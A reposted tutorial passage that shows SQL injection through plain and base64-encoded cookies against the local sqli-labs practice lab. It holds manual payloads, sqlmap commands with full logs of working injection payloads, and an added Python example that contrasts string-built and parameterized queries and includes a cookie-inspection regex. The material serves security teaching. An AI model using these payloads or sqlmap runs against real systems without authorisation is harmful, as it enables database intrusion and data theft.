[19:53:47] [ERROR] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent', skipping to the next URL
[19:53:47] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'XXX\sqlmap\output\results-03102020_0654pm.csv'

[*] ending @ 19:53:47 /2020-03-10/


4. SQL injection in HTTP headers: cookie injection

Because a cookie can carry arbitrary information, the server can use it to filter and regularly maintain that information and so determine state across HTTP transfers.
The classic use of cookies is to determine whether a user has already logged in to the site.
View the cookie information in the browser console:
sqlmap cookie check
You can see Baidu's recruitment message; doesn't that look classy!!!
In practice, the code uses the cookie to pass parameters but does not filter the parameters passed in the cookie, which produces a SQL injection vulnerability.
Test as follows:
HTTP cookie injection test
The error message obtained:

''admin'' LIMIT 0,1'

Change it to ' and updatexml(1,concat(0x7e,version(),0x7e),1) --+, put it in the cookie and test again:
HTTP cookie injection test2
Clearly, the database version is now obtained through the page's echoed output.
In the same way, ' and updatexml(1,concat(0x7e,database(),0x7e),1) --+ returns the name of the current database.

sqlmap security test

Specify the cookie as the injection point through the request file and save the file as follows:
sqlmap cookie test
Mark the injection point with * on the cookie parameter, e.g. Cookie: uname=admin*; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF, then run the test:

python sqlmap.py -r C:\Users\Lenovo\Desktop\target.txt --banner --batch --level 3

Output

        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:08:36 /2020-03-10/

[14:08:36] [INFO] parsing HTTP request from 'XXXX\target.txt'
[14:08:37] [INFO] found a total of 2 targets
URL 1:
GET http://127.0.0.1:80/sqli-labs/Less-20/index.php
Cookie: uname=admin*; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
do you want to test this URL? [Y/n/q]
> Y
[14:08:37] [INFO] testing URL 'http://127.0.0.1:80/sqli-labs/Less-20/index.php'
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[14:08:37] [INFO] using 'XXX\sqlmap\output\results-03102020_0208pm.csv' as the CSV results file in multiple targets mode
[14:08:37] [INFO] testing connection to the target URL
[14:08:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:08:41] [INFO] testing if the target URL content is stable
[14:08:43] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[14:08:43] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[14:08:45] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be dynamic
[14:08:47] [INFO] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might be injectable (possible DBMS: 'MySQL')
[14:08:49] [INFO] heuristic (XSS) test shows that (custom) HEADER parameter 'Cookie #1*' might be vulnerable to cross-site scripting (XSS) attacks
[14:08:49] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[14:08:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:08:51] [WARNING] reflective value(s) found and filtering out
[14:08:59] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:08:59] [INFO] testing 'Generic inline queries'
[14:09:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:09:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:09:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:09:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:09:09] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:09:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:09:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:09:16] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable

[14:09:16] [INFO] testing 'MySQL inline queries'
[14:09:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[14:09:18] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[14:09:46] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[14:09:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[14:09:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[14:09:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[14:09:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[14:09:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:10:12] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[14:10:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:10:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:10:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:10:24] [INFO] target URL appears to have 3 columns in query
[14:10:39] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin' AND 5923=5923-- pgYe; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uname=admin' AND (SELECT 6510 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6510=6510,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BsUL; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 5241 FROM (SELECT(SLEEP(5)))QgDY)-- Yovg; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF


    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: uname=-3483' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6a71,0x68794470424245485a554f75584c426264475469635964656c73516178775061426c516350565255,0x7170707171)-- -; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
---
do you want to exploit this SQL injection? [Y/n] Y
[14:10:39] [INFO] the back-end DBMS is MySQL
[14:10:39] [INFO] fetching banner
[14:10:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.5.53'
[14:10:51] [INFO] skipping 'http://127.0.0.1/sqli-labs/Less-20/index.php'
[14:10:51] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'XXX\sqlmap\output\results-03102020_0208pm.csv'

[*] ending @ 14:10:51 /2020-03-10/


5. SQL injection in HTTP headers: cookie Base64 injection

Introduction to base64

base64 encoding converts binary data into characters and can be used to pass longer identifying information in an HTTP environment.
base64 is one of the most common encodings on the network for transmitting 8-bit byte codes; it represents binary data using 64 printable characters.
Conversion method:
Convert the original content to binary, take 6 bits at a time from left to right, then pad two 0 bits at the high end to form the new content.
Encoding rules:

  • 3 characters become 4 characters
  • A newline is added every 76 characters
  • The trailing terminator (the padding) also has to be handled

base64 is reversible: encoded data can be converted back.
For base64 encoding you can use http://tool.oschina.net/encrypt?type=3

Base64 injection

Base64-encode the injection statement and insert it at the corresponding position in the Cookie to probe for the SQL injection vulnerability, for example:
the plaintext " or 1=1 # corresponds to the encoded form IiBvciAxPTEgIw==
Visit http://127.0.0.1/sqli-labs/Less-22/ and log in to test; an error is reported because no time zone is set. Set it in the PHP configuration file, restart, and refresh again to access the page normally, as follows:
sqlmap cookie base64 test
The interface obtained is as follows:
sqlmap cookie base64 interface
It contains uname = YWRtaW4=; the base64 decoding of YWRtaW4= is admin.
Append a backslash \ to admin, base64-encode it, then edit and resend, as follows:
sqlmap cookie base64 test2
The error message is as follows:

'"admin" LIMIT 0,1'

That is, an injection point has been found and injection testing can proceed.
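
The following Python is an added example (not code from sqli-labs or from this post) covering both the cookie injection of section 4 and the base64 rules and Base64 injection of section 5: it encodes by the 6-bit rule described above, shows how the decoded cookie value lands in a string-built query versus a parameterized one, and inspects Cookie headers after base64-decoding them, which is what a plain-text filter misses. The query shape, users table, cookie samples and csrftoken placeholder are constructed assumptions.

```python
# Added example: how a (base64-wrapped) cookie value reaches the SQL query and
# how to inspect such cookies. Query shape, table and samples are constructed.
import base64
import binascii
import re
import sqlite3
import string

B64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def b64encode_manual(data: bytes) -> str:
    """Base64 as the text describes it: 3 bytes -> 24 bits -> four 6-bit groups
    -> 4 printable characters; a short last group is zero-padded and marked '='."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        bits = "".join(f"{b:08b}" for b in chunk)
        bits += "0" * (-len(bits) % 6)          # pad to a multiple of 6 bits
        for j in range(0, len(bits), 6):
            out.append(B64_ALPHABET[int(bits[j:j + 6], 2)])
        out.append("=" * (3 - len(chunk)))      # one '=' per missing byte
    return "".join(out)


def decode_cookie(value: str):
    """Strict base64 decode; None when the value is not base64 text. Less-22 style
    code decodes uname before building SQL, so an inspector must decode too."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def build_query_vulnerable(uname: str) -> str:
    """Constructed query shape with the decoded cookie concatenated in: 'admin\\'
    leaves an unbalanced quote (the error in the text), '" or 1=1 #' closes it."""
    return f'SELECT * FROM users WHERE username="{uname}" LIMIT 0,1'


def make_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")   # in-memory users table, one constructed row
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-password')")
    return conn


def lookup_user_safe(conn: sqlite3.Connection, uname: str):
    """Hardened form: the decoded value is bound as a parameter, so quotes and
    comment markers inside it are just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? LIMIT 1", (uname,)
    ).fetchone()
    return row[0] if row else None


# Metacharacters and keywords taken from the payloads used on this page.
SQLI_PATTERN = re.compile(
    r"""['"\\]|--|#|\b(or|and|union|select|sleep|updatexml)\b""", re.IGNORECASE
)


def parse_cookie_header(header: str) -> dict:
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; split on the first '=' only so that
    base64 padding in a value survives."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            pairs[name] = value
    return pairs


def inspect_cookie(header: str) -> dict:
    """Flag values carrying SQL metacharacters, checking the raw value first
    and then its base64 decoding. Returns {name: (layer, value)}."""
    findings = {}
    for name, value in parse_cookie_header(header).items():
        if SQLI_PATTERN.search(value):
            findings[name] = ("plain", value)
            continue
        decoded = decode_cookie(value)
        if decoded is not None and SQLI_PATTERN.search(decoded):
            findings[name] = ("base64", decoded)
    return findings


# Constructed Cookie headers; the csrftoken value is a placeholder.
SAMPLE_COOKIES = [
    "uname=YWRtaW4=; csrftoken=tok_constructed",           # admin: normal login
    "uname=YWRtaW5c; csrftoken=tok_constructed",           # admin\ : the quote probe
    "uname=IiBvciAxPTEgIw==; csrftoken=tok_constructed",   # " or 1=1 # from the text
    "uname=admin' AND 5923=5923-- pgYe; csrftoken=tok_constructed",  # plain, Less-20 style
]


def demo() -> None:
    conn = make_demo_db()
    for header in SAMPLE_COOKIES:
        raw = parse_cookie_header(header)["uname"]
        uname = decode_cookie(raw) or raw            # what the Less-22 code would use
        print(header)
        print("  findings      :", inspect_cookie(header))
        print("  vulnerable SQL:", build_query_vulnerable(uname))
        print("  safe lookup   :", lookup_user_safe(conn, uname))
```

Call demo() to see, for each sample, what the string-built query becomes and that the parameterized lookup only matches the real admin row.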

sqlmap security test

Capture the request content and save it to target.txt as follows:
sqlmap cookie base64 test3

python sqlmap.py -r C:\Users\Lenovo\Desktop\target.txt --banner --batch --level 3 --dbms mysql --tamper base64encode.py

Output

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:13:42 /2020-03-10/

[19:13:42] [INFO] parsing HTTP request from 'XXXX\target.txt'
[19:13:42] [INFO] loading tamper module 'base64encode'
Cookie parameter 'csrftoken' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[19:13:43] [INFO] testing connection to the target URL
[19:13:45] [INFO] testing if the target URL content is stable
[19:13:47] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[19:13:47] [INFO] testing if Cookie parameter 'uname' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[19:13:49] [WARNING] reflective value(s) found and filtering out
[19:13:49] [INFO] Cookie parameter 'uname' appears to be dynamic
[19:13:51] [INFO] heuristic (basic) test shows that Cookie parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[19:13:53] [INFO] testing for SQL injection on Cookie parameter 'uname'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
[19:13:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:15:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[19:16:44] [INFO] Cookie parameter 'uname' appears to be 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' injectable
[19:16:44] [INFO] testing 'Generic inline queries'
[19:16:46] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:16:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:16:50] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:16:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:16:54] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:16:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:16:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:17:00] [INFO] Cookie parameter 'uname' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:17:00] [INFO] testing 'MySQL inline queries'
[19:17:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:17:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:17:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:17:10] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:17:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:17:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:17:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:17:32] [INFO] Cookie parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:17:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:17:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:17:38] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:17:46] [INFO] target URL appears to have 3 columns in query
[19:17:51] [INFO] Cookie parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 112 HTTP(s) requests:
---
Parameter: uname (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: uname=YWRtaW4=" AND 2468=(SELECT (CASE WHEN (2468=2468) THEN 2468 ELSE (SELECT 7798 UNION SELECT 4608) END))-- -; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uname=YWRtaW4=" AND (SELECT 8260 FROM(SELECT COUNT(*),CONCAT(0x71766a7871,(SELECT (ELT(8260=8260,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "FZVA"="FZVA; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=YWRtaW4=" AND (SELECT 1385 FROM (SELECT(SLEEP(5)))SWci) AND "YNkC"="YNkC; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: uname=YWRtaW4=" UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7871,0x6970776252484979597566737647444b636c46764345464e674142776d746348467946594c456c4e,0x716b626b71)-- -; csrftoken=gdhsRRG8COXmUmcoRBvbc259rYnbPKXFpEiggOHQF9MZxMkmBsX8zavVCyuWB7oF
---
[19:17:51] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:17:51] [INFO] the back-end DBMS is MySQL
[19:17:51] [INFO] fetching banner
[19:18:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.5.53'
[19:18:03] [INFO] fetched data logged to text files under 'XXX\sqlmap\output\127.0.0.1'

[*] ending @ 19:18:03 /2020-03-10/

Reposted from blog.csdn.net/CUFEECR/article/details/104781488